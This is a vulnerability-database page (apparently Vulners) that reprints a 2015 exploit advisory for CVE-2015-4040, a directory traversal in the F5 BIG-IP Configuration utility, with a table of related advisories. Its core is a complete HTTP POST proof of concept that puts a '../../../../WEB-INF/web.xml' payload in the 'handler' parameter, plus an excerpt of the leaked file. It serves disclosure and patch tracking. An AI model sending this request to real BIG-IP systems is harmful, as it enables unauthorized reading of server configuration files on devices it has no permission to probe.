Vulners
Lucene search
F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - Directory Traversal
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - File Path Traversal Vulnerability | 13 Oct 201500:00 | – | zdt |
 | F5 BIG-IP Directory Traversal Vulnerability | 18 Sep 201500:00 | – | cnvd |
 | CVE-2015-4040 | 17 Sep 201516:00 | – | cve |
 | CVE-2015-4040 | 17 Sep 201516:00 | – | cvelist |
 | EUVD-2015-4068 | 7 Oct 202500:30 | – | euvd |
 | F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - Directory Traversal | 13 Oct 201500:00 | – | exploitpack |
 | K17253: BIG-IP Configuration utility vulnerability CVE-2015-4040 | 21 Feb 202318:46 | – | f5 |
| SOL17253 - BIG-IP Configuration utility vulnerability CVE-2015-4040 | 9 Sep 201500:00 | – | f5 |
 | F5 Networks BIG-IP : BIG-IP Configuration utility vulnerability (K17253) | 10 Sep 201500:00 | – | nessus |
 | CVE-2015-4040 | 17 Sep 201516:59 | – | nvd |
10
# Exploit Title: [F5 BigIP File Path Traversal Vulnerability]
# Discovered by: Karn Ganeshen
# Reported on: April 27, 2015
# New version released on: September 01, 2015
# Vendor Homepage: [www.f5.com]
# Version Reported: [F5 BIG-IP 10.2.4 Build 595.0 Hotfix HF3]
# CVE-2015-4040 [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4040
]
# Multiple Additional F5 products & versions are Affected and documented
here:
https://support.f5.com/kb/en-us/solutions/public/17000/200/sol17253.html
*Vulnerability Details*
The handler parameter is vulnerable to file path manipulation attacks. When
we submit a payload
*/tmui/locallb/virtual_server/../../../../WEB-INF/web.xml* in the *handler*
parameter, the file *WEB-INF/web.xml* is returned.
*PoC:*
POST /tmui/Control/form HTTP/1.1
Host: <IP>
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
Trident/5.0)
Connection: close
Referer: https://
<IP>/tmui/Control/jspmap/tmui/locallb/virtual_server/list.jsp?&FilterBy=status_availability&Filter=2
Content-Type: application/x-www-form-urlencoded
Content-Length: 1004
Cookie: JSESSIONID=3211A73547444840255BAF39984E7E3F;
BIGIPAuthUsernameCookie=admin;
BIGIPAuthCookie=9B1099DD8A936DDBD58606DA3B5BABC7E82C43A5;
F5_CURRENT_PARTITION=Common;
f5formpage="/tmui/locallb/virtual_server/list.jsp?&";
f5_refreshpage="https%3A//<IP>/tmui/Control/jspmap/tmui/locallb/virtual_server/list.jsp";
f5currenttab="main"; f5mainmenuopenlist=""; f5advanceddisplay=""
_timenow=Fri+Apr+24+14%3a48%3a38+EST+2015&_bufvalue_before=6hU2%2fMbRfPe7OHQ7VVc7TEffOpg%3d&exit_page=%2ftmui%2flocallb%2fvirtual_server%2fcreate.jsp&search_input=*&search_button_before=Search&_timeno
*...[SNIP]...*
fore=&enableObjList_before=&exit_page_before=%2ftmui%2flocallb%2fvirtual_server%2fcreate.jsp&row_count=0&_bufvalue_validation=NO_VALIDATION&disable_before=Disable&exit_button_before=Create...&handler=
*%2ftmui%2flocallb%2fvirtual_server%2f..%2f..%2f..%2f..%2fWEB-INF%2fweb.xml*
*Web.xml is returned in the Response:*
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE web-app
PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.2//EN"
"http://java.sun.com/j2ee/dtds/web-app_2_2.dtd">
*<!--Automatically created by Tomcat JspC.--><web-app>*
*...[config file output redacted here]...*
*.....*Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Oct 2015 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 24
EPSS0.06773